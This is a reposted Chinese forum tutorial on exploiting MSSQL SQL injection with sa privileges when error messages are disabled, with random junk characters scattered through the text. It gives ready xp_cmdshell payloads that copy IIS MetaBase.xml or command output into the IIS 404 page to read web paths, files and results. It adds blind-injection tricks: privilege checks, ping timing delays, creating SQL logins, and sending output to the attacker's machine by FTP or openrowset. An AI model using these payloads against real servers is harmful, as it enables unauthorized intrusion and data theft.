遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。% l- ~& A! Q) T8 {
$ C0 l$ K( j' l+ t- z 虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。4 H% O; ^4 ]: @) h! N% W
6 R- V4 l5 f0 u6 x
这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。4 |) x. L3 O1 D- _6 t; i
! {5 Z: e7 p1 {& |
IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm2 x$ T7 k( B6 k; b. c
1 E& |' w3 `( }; ? h* W1 m3 l w
得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--0 v* `/ E) b" y: y, p2 R
1 |2 A( F, r% h& P# U ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
8 Y$ h' p- v1 h1 }% y: s# u+ V7 N
执行命令得到回显# Z- {9 F% ?9 i. I' s% V4 N+ q
0 ?: C# x6 j: C: O
通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
. }8 a3 q Q5 e% l- Y# e' q- t# w" R8 k" m/ F F) n0 [+ r9 I
得到文件也shi相同,把文件copy到404b.htm就行了
' ?2 I' J4 Z4 I# |% @9 l( V# Y2 D: Q; i! U+ o& C' c( U) \1 g
by 28ice, 2008/6/266 _$ M4 g5 k; c7 Q9 q- M5 M
% R+ {' y5 X3 V% r( K' D) |7 p/ a
摘自 28度的冰 ?8 u/ z* _% E
7 v( P! G* [9 [1 @8 J% @; c 盲注判断权限和操作系统版本
8 R$ A& [* Q) Q5 d q2 Q! K3 Z' c+ J5 z: d/ B
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?
" W$ A/ R3 s; \, Q9 I' B' V8 W
' G3 z" {, Y4 T5 ?' U; _- L# G 最简单的,可能以用这样的方法:
+ b. Y: q8 z) V6 E; `
5 W& A8 Y! D% b4 d 1=(select IS_SRVROLEMEMBER(’sysadmin’))% O$ y! ~2 f; @9 n E. w
* ~7 ^2 d. B: w- a4 Z
当然,有些情况下,这个方法并不奏效。: \" q, M- Q5 O$ R& a) T
1 Z. J) V% G) ^( l5 h$ d 既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
- W) f8 b6 N# i3 T# p& @! Y
/ U- L5 o- w' y" W4 o$ W 有个3办法可能以解决这个问题
5 O* C9 h9 r* j3 {+ [4 n8 R# N; K, u- R! \9 @; B
a.把执行结果写到404b.htm,具体请看我的上一篇文章
8 d y0 U, E0 c3 Z+ X
- f1 ^% B* \( X4 K b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟) H) [$ y6 t! k/ n, ^5 Q
2 z& m' b# f% Y+ ?8 L( I
c.如果1433端口可能以连接,那干脆新建个sql登录* B" ?7 C; [% F. p* _
5 x5 v2 U% r! a# d! g
d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数2 j8 {: q/ I' ]* Z$ o
/ j( c: ]' C9 B5 @7 c 还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下+ W; N# G! e/ K! T5 k+ O
$ f- g8 e( Y. ?* |
很简单
% u3 O3 O* k4 Y+ O) C& _, z
8 b. R a* J# v 执行systeminfo
9 I. V: o& f8 J$ N W7 T- r" p- v$ |6 L. Z8 g! ]4 V* y: ^- g
在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。 |
发表于 2012-9-15 14:15:42
收藏
支持
反对